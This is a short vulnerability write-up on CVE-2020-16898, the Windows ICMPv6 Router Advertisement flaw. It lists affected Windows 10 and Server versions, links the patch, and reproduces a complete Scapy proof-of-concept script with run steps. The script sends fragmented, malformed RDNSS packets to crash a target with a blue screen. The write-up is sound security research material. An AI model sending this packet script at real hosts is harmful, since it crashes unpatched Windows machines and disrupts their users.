CVE-2020-16898
Description
CVE-2020-16898 is known as the "Bad Neighbor" vulnerability. It is a remote code execution vulnerability in the Windows TCP/IP stack's handling of ICMPv6 Router Advertisement packets. The flaw is caused by improper handling of ICMPv6 Router Advertisement packets that carry option type 25 (RDNSS) with an even length field. An attacker can exploit it by sending a specially crafted ICMPv6 Router Advertisement packet to an affected host; successful exploitation allows arbitrary code execution on the target server or client.
Affected versions
Product | Architecture | Version | Edition | Tested
---|---|---|---|---
Windows 10 | x86/x64/ARM64 | 1709 | | :heavy_check_mark:
Windows 10 | x86/x64/ARM64 | 1803 | |
Windows 10 | x86/x64/ARM64 | 1809 | |
Windows 10 | x86/x64/ARM64 | 1903 | |
Windows 10 | x86/x64/ARM64 | 1909 | |
Windows 10 | x86/x64/ARM64 | 2004 | |
Windows Server 2019 | | | |
Windows Server 2019 | | | Server Core installation |
Windows Server | | 1903 | Server Core installation |
Windows Server | | 1909 | Server Core installation |
Windows Server | | 2004 | Server Core installation |
Patch
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898
Exploitation
So far only a blue-screen (BSOD) PoC has been published, which at best amounts to CVE-2020-16899. Before running it, IPv6 must be enabled in the virtual machine, as shown in the figure.
Then change the IPv6 addresses in the script:
```python
from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

# Change these to match the test VM: the target's IPv6 address and the
# sender's link-local address (with the interface index after '%').
v6_dst = "fd15:4ba5:5a2b:1008:7d57:7c30:726:1e6f"
v6_src = "fe80::7d57:7c30:726:1e6f%4"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA()
e = ICMPv6NDOptRDNSS()
e.len = 21        # length field does not match the ten addresses below
e.dns = [
    "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
]

aaa = ICMPv6NDOptRDNSS()
aaa.len = 8       # RDNSS option with an even length field (see description above)

pkt = ICMPv6ND_RA() / aaa / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

# Fragment the Router Advertisement and send each piece
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255) / \
              IPv6ExtHdrFragment() / pkt
l = fragment6(p_test_frag, 200)
for p in l:
    send(p)
```
Finally, install the dependency with `pip install scapy`; running the script then triggers the blue screen directly.
Script source
- BSOD script: momika233